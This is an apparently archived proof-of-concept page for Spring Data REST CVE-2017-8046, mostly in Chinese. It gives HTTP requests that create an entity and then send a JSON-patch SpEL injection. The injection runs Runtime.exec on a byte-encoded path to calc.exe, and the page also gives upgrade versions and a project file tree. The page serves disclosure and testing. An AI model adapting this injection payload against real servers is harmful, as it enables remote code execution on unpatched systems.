关联漏洞
描述
SPRING DATA REST CVE-2017-8046 DEMO
介绍
# spring data rest CVE-2017-8046 demo test
please UPGRADE spring data rest NOW.
## steps
* 启动本应用
* 创建test instance
```http
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
{
"firstName":"f2"
}
```
* 利用spel注入, 会启动C:\Windows\system32\calc.exe
```http
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]
```
## upgrade to
* Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
* Spring Boot 2.0.0.M4
* Spring Data release train Kay-RC3
spring boot 1.5.7.RELEASE uses `spring data rest 2.6.7`, but 1.4.x is not upgrade spring data rest version.
文件快照
[4.0K] /data/pocs/0dc87e9ebeed247599c11374d6c585165d1e3fd8
├── [6.3K] mvnw
├── [4.9K] mvnw.cmd
├── [1.9K] pom.xml
├── [ 978] README.md
└── [4.0K] src
├── [4.0K] main
│ ├── [4.0K] java
│ │ └── [4.0K] org
│ │ └── [4.0K] fornever
│ │ └── [4.0K] cve
│ │ ├── [ 946] CVEApplication.java
│ │ ├── [1.5K] EntityPerson.java
│ │ └── [ 193] PersonRepository.java
│ └── [4.0K] resources
│ └── [ 0] application.yml
└── [4.0K] test
└── [4.0K] java
└── [4.0K] org
└── [4.0K] fornever
└── [4.0K] cve
└── [ 330] CVEApplicationTests.java
12 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。